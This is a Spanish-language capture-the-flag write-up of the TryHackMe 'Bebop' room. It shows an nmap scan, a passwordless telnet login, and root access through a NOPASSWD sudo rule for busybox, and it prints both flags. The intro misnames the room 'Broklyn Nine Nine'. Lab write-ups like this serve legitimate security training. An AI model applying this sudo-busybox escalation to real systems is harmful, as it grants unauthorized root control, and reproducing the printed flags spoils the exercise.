[TryHackMe] Bebop

Hoy vamos a hackear la maquina de TryHackMe llamada Broklyn Nine Nine. Podeis descargarla desde el siguiente enlace: https://tryhackme.com/room/bebop
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-17 14:24 CEST Nmap scan report for Host is up (0.050s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0) | ssh-hostkey: | 2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA) | 256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA) |_ 256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519) 23/tcp open telnet BSD-derived telnetd Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.52 seconds
    Vemos que tiene abierto el puerto de telnet. Probamos a establecer conexion.
    ~ > telnet Trying Connected to Escape character is '^]'. login:
    Nos pide un login, ya que en la pagina inicial de la room nos indicaban que se nos ha asignado el codename "pilot" probamo con pilot :)
    login: pilot Last login: Mon Aug 17 12:25:35 from ip-10-9-24-208.eu-west-1.compute.internal FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr 4 02:07:22 UTC 2019 Welcome to FreeBSD! Release Notes, Errata: https://www.FreeBSD.org/releases/ Security Advisories: https://www.FreeBSD.org/security/ FreeBSD Handbook: https://www.FreeBSD.org/handbook/ FreeBSD FAQ: https://www.FreeBSD.org/faq/ Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ FreeBSD Forums: https://forums.FreeBSD.org/ Documents installed with the system are in the /usr/local/share/doc/freebsd/ directory, or can be installed later with: pkg install en-freebsd-doc For other languages, replace "en" with a language code like de or fr. Show the version of FreeBSD installed: freebsd-version ; uname -a Please include that output and any error messages when posting questions. Introduction to manual pages: man man FreeBSD directory layout: man hier Edit /etc/motd to change this login announcement. Want to see how much virtual memory you're using? Just type "swapinfo" to be shown information about the usage of your swap partitions. [pilot@freebsd ~]$
    Estamos logueados sin necesidad de password!
  • user.txt
  • [pilot@freebsd ~]$ ls user.txt [pilot@freebsd ~]$ cat user.txt THM{r3m0v3_b3f0r3_fl16h7}
  • Privilege Escalation
  • Ahora que estamos dentro, exploramos un poco el sistema y miramos si podemos hacer algo con "sudo".
    [pilot@freebsd ~]$ sudo -l User pilot may run the following commands on freebsd: (root) NOPASSWD: /usr/local/bin/busybox
    Podemos usar busybox, el cual nos puede servir para escalar privilegios.
    [pilot@freebsd ~]$ sudo busybox sh # id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
  • root.txt
  • Ya como root miramos la flag...
    # cd /root # ls .bash_history .cshrc .history .k5login .login .profile root.txt # cat root.txt THM{h16hw4y_70_7h3_d4n63r_z0n3}
  • End
  • Con esto, ya habriamos finalizado la maquina :)